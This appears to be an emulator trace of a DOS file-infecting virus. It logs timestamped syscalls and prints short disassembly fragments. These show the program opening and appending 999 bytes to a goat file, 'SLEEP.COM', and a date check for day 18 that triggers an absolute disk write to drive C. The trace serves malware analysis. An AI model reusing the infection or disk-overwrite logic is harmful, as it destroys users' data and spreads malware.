2018-12-25T12:28:38.662649171Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.664683758Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.666415119Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.671003693Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.672659205Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.674747322Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.676955347Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.678366401Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.679679875Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.681943854Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.683280665Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.684579003Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.686944566Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.688410196Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.689955064Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.691952463Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.693379878Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.694829544Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.699157458Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.700562641Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.701865541Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.703752412Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.705846667Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.707150835Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.709193713Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.710829501Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.71246516Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.715039979Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.716605349Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.718149384Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.720177462Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.721468273Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.722719924Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.725077768Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.726385452Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.72760194Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.729518677Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.73088621Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.732408384Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.734109245Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.735843299Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.737355887Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.739030788Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.740989409Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.742609105Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.744423786Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.74576775Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.747019721Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.748294587Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.749731604Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.750990788Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.752390302Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.754049803Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.755417746Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.756901605Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.758605302Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.760121331Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.761800054Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.763698466Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.765211449Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.766894011Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.768704048Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.76991209Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.771357619Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.773383099Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.775375946Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.776901145Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.779478392Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.781262998Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.783003423Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.785457726Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.78716228Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.788803024Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.791584398Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.79334221Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.795201742Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.79753259Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.800037322Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.801698216Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.803864202Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.805171116Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.806601229Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.808668661Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.810285866Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.812231867Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.814442525Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.815830051Z 44 PC: 12c04 | Get time 0x12c04: mov word ptr ds:[bp + 0x136], dx
0x12c09: jmp 0x12c0b
0x12c0b: mov ax, 0x4e00
0x12c0e: mov cx, 0
0x12c11: lea dx, word ptr [bp + 0x1e8]
0x12c15: int 0x21
0x12c17: jae 0x12c1c
0x12c19: jmp 0x12d1f
0x12c1c: push 0x4300
0x12c1f: pop ax
0x12c20: mov dx, 0x9e
0x12c23: int 0x21
0x12c25: mov word ptr ds:[bp + 0x349], cx
0x12c2a: mov ax, 0x4301
0x12c2d: mov cx, 0
0x12c30: int 0x21
0x12c32: mov ax, 0x3d02
0x12c35: mov dx, 0x9e
0x12c38: int 0x21
0x12c3a: push ax
2018-12-25T12:28:38.817954638Z 78 PC: 12c17 | Find first file
2018-12-25T12:28:38.824513183Z 67 PC: 12c25 | Get or set file attributes
2018-12-25T12:28:38.830153946Z 67 PC: 12c32 | Get or set file attributes
2018-12-25T12:28:39.3073489Z 61 PC: 12c3a | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:28:39.319992627Z 63 PC: 12c49 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:28:39.326950425Z 87 PC: 12c94 | Get or set file date and time
2018-12-25T12:28:39.328710816Z 66 PC: 12ca7 | Move file pointer
2018-12-25T12:28:39.331691964Z 64 PC: 12cb4 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:28:39.334713445Z 64 PC: 12cd3 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:28:39.337619056Z 64 PC: 12ce0 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:28:39.341969795Z 66 PC: 12ceb | Move file pointer
2018-12-25T12:28:39.34360857Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.345285979Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.347665257Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.349440843Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.351077293Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.353312547Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.354909001Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.356611598Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.35901635Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.360576548Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.362248338Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.364819096Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.366272254Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.368059203Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.370573058Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.372509413Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.37415156Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.376574136Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.37855156Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.380174755Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.382724752Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.384047421Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.385371876Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.387488483Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.38889342Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.390194072Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.392318947Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.393852879Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.39556998Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.397939765Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.399890897Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.401614368Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.403943677Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.405904813Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.407530392Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.409327868Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.411636197Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.412986133Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.414495725Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.416679505Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.418394331Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.420201687Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.422729942Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.423945024Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.425251222Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.426781154Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.428116465Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.43094542Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.4324031Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.4337162Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.436136571Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.438214603Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.439962909Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.442437481Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.444506471Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.446209519Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.448639385Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.450645695Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.452333675Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.454975811Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.456653505Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.458706537Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.461007949Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.463313292Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.464686339Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.466778331Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.468423708Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.469799858Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.471765136Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.473926961Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.475356288Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.47765993Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.479296323Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.480946001Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.48319075Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.484789021Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.48643376Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.488688598Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.49030396Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.491920092Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.493891497Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.495350704Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.497003715Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.49949677Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.501109731Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.502803491Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.505103308Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.506696238Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.508331442Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.510721687Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.512005518Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.513269609Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.514916725Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.516562105Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.518137181Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.520200199Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.521782924Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.524306772Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.52640109Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.527986154Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.53033042Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.53264152Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.534446521Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.536746131Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.538675778Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.540290135Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.543153211Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.545500856Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.547082353Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.549409376Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.550994709Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.55254544Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.555089506Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.556494551Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.557853392Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.560064064Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.561459161Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.563158313Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.565256002Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.566925309Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.568488618Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.570580612Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.571925152Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.573221994Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.575117539Z 64 PC: 12cfb | Write file or device (Write 999 bytes on handle 5)
2018-12-25T12:28:39.584291685Z 87 PC: 12d0c | Get or set file date and time
2018-12-25T12:28:39.585716119Z 62 PC: 12d11 | Close file
2018-12-25T12:28:39.593792549Z 67 PC: 12d1f | Get or set file attributes
2018-12-25T12:28:39.603408172Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:28:39.609207529Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":18,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10628,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:38.913319175Z 42 PC: 12ba6 | Get date 0x12ba6: cmp dl, 0x12
0x12ba9: jne 0x12bb2
0x12bab: mov cx, 0xffff
0x12bae: mov al, 2
0x12bb0: int 0x26
0x12bb2: popaw
0x12bb3: call 0x12bbb
0x12bb6: jmp 0x12be8
0x12bb8: nop
0x12bb9: pop ss
0x12bba: pushaw
0x12bbc: mov dx, word ptr ds:[bp + 0x136]
0x12bc1: jmp 0x12bc8
0x12bc3: nop
0x12bc4: mov ah, 0x4c
0x12bc6: int 0x21
0x12bc8: mov cx, 0x7c
0x12bcb: lea si, word ptr [bp + 0x165]
0x12bcf: mov di, si
0x12bd1: int3
2018-12-25T12:28:38.920818991Z 68 PC: 12be3 | I/O control for devices (Set for = '��|')
2018-12-25T12:28:38.922473718Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.924113464Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.930291056Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.931757403Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.933182966Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.934902579Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.936447527Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.937837178Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.939136411Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.940665975Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.942238303Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.94381675Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.945811412Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.94732138Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.948800381Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.951091179Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.952606701Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.954870607Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.956912262Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.958468916Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.960071036Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.962319329Z 68 PC: 12be3 | I/O control for devices (See above)